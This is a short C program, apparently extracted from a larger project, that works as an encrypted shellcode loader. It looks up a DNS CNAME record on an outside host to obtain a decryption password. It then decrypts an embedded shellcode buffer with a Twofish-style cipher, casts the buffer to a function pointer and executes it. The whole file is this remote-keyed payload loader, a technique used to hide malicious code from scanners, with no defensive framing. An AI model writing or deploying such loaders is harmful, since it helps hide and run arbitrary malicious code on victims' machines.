
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int u32 ;
typedef char BYTE ;


 int T_CNAME ;
 int decrypt (int *,int **,char*) ;
 int free (int *) ;
 int fullKey (int *,int,int **) ;
 scalar_t__ hostname ;
 int keySched (char*,int,int **,int *,int*) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,int ,int) ;
 char* ngethostbyname (unsigned char*,int ) ;
 int printHex (char*,int) ;
 int printf (char*,...) ;
 char* strchr (char*,char) ;
 int strcpy (scalar_t__,char*) ;
 int strlen (char*) ;

int main(int argc, char **argv)
{
    char* password;
    strcpy(hostname , "password.andrelima.info");
    password = ngethostbyname((unsigned char*)hostname , T_CNAME);
    char* firstDot = strchr(password,'.');
    *firstDot = (char)0;
    printf("\nRetrieved password is: %s\n\n",password);

    u32 *S;
    u32 K[40];
    int k;
    u32 QF[4][256];
    BYTE plaintext[16];
    BYTE key[32];

    int key_len = strlen(password);
    BYTE shellcode[] = "\x55\x9B\x2B\x3A\x9E\x73\x23\xCE\xC5\x7B\x61\xDC\x97\x40\x29\xC9\x83\x49\x59\x5E\xE7\x28\x9B\x46\x79\xB2\x8E\x73\x04\x64\x11\x54";

    int shellcode_len = strlen((char*)shellcode);
    int (*ret)() = (int(*)())shellcode;

    memset(key, 0, 32);

    memcpy(key, password, key_len);
    keySched(key, 128, &S, K, &k);
    fullKey(S, k, QF);
    free(S);
    int i=0;
    while (i < shellcode_len) {
        memcpy(plaintext, &shellcode[i], 16);

        decrypt(K, QF, plaintext);

     printHex(plaintext, 16);
        memcpy(&shellcode[i], plaintext, 16);
        i += 16;
    }
    printf("\n");
    ret();
    return 0;
}
